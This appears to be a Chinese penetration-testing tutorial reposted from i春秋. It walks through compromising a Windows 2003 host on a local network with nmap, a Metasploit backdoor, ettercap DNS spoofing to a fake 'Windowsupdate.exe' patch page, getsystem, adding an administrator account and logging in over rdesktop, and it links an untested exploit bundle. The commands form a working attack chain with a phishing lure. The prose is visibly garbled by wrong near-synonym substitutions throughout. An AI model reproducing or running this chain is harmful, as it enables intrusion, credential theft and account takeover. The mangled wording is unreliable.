本机ubuntuIP:192.168.0.3
假造机03主机IP:192.168.0.128
我们先来模仿一下比如我拿到了我本机192.168.0.3这台服务器的管理权限后我是怎样继承渗出192.168.0.128这台主机的起首在内网渗出中最常用的就是信息网络以及端口扫描提及端口扫描和主机信息网络各人不得不想到了nmap
nmap
nmap是一个网络毗连端扫描软件,用来扫描网上电脑开放的网络毗连端。确定哪些服务运行在哪些毗连端,而且推断盘算机运行哪个操纵体系(这是亦称fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络体系安全。
正如大多数被用于网络安全的工具,nmap也是不少黑客及骇客(又称脚本小子)爱用的工具。体系管理员可以利用nmap来探测工作环境中未经答应利用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而筹划攻击的方法。
Nmap常被跟评估体系弊端软件Nessus等量齐观。Nmap以秘密的伎俩,避开突入检测体系的监督,并尽大概不影响目标体系的一样平常操纵。
Nmap在黑客帝国(TheMatrix)中,连同SSH1的32位元循环冗余校验弊端,被崔妮蒂用以入侵发电站的能源管理体系。
别的更多nmap相干信息请到百度百科查察太多全搬过来的话界面就不是特别雅观了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq
我们用nmap的Intensescan模块来扫描192.168.0.128这台主机是在内网中扫描端口开放信息以及主机信息等一系列信息~Intensescan模块可以满意一样平常的扫描假如你要扫描内网主机的话nmap192.168.0.1/24即可192.168.0.1是我的路由器地点
nmap-T4-A-v192.168.0.128
这里我们不得不说一下nmap确实很强大下面为输出结果
我们得知主机体系为Windows2003用户组版本信息端口信息开放了3389固然nmap有很多插件可以扫描主机弊端题目谁人我没找到==
咳咳设置Metasploitexe后门
ps:默认端口4444
有的主机可以共同Metasploit溢出渗出xp那样直接获取到一个cmd实行权限本台主机我看了下没有长途溢出题目补丁都打好了。
主机开放3389后而且是在内网那么我们dns诱骗内网全部主机的dns我们写一个html界面提示你电脑存在xx弊端打补丁后门改名字可以改为Windowsupdate.exehtml界面越逼真越好。
ettercap-T-iwlp2s0-q-Pdns_spoof//////
下面为输出结果参数题目:
-T文本模式-i接要诱骗的适配器-q安静模式-Pdns_spoof调用这个插件//////代表全部IP和子网掩码
对方主机打开任何网站都会成为我本机的index.html
Linux的index.html在/var/www/html/目次
直接gedit/var/www/html/index.html即可编辑
起首你要先辈入root状态
否则只能读不能写
上面说了03主机是受害者这里我假冒被骗了
打开了后门
这里我们的msf上线了
资助信息
起首我们先来读取下192.168.0.128这台主机的hash数值
固然这些数值不好解密咳咳
有提权exp可以直接表现hash值解密后的
getsystem获取最高权限
shell进入cmd提权
我们乐成获取到了最高权限进入到了c盘Windowssystem32的cmd.exe直接一条下令即可添加用户管理员权限
netuserxaisecxaisec/addnetlocalgroupadministratorsxaisec/add
毗连192.168.0.128这台主机rdesktop
没有rdesktop的可以apt-getinstallrdesktop安装
rdesktop-h参数
rdesktop192.168.0.128-uxaisec-pxaisec
-u是用户名的意思-p是暗码
读取解密哈希值
hash下
administratoradmin
xaisecxaisec
利用administrator登录
rdesktop192.168.0.128-uadministrator-padmin
末了我整理了下提权exp有的没有测试不清楚有没有后门自行查抄
链接:https://pan.baidu.com/s/1i56zH0T暗码:qdhm
作者:小爱_Joker
泉源:i春秋
链接:https://bbs.ichunqiu.com/thread-20514-1-1.html
炼石信息安全培训春季班开招
QQ:495066536
372806985
敬请连续关注……
CopyrightYourWebSite.SomeRightsReserved.
京ICP备2023016396号-1PoweredByESCLINK.
我要评论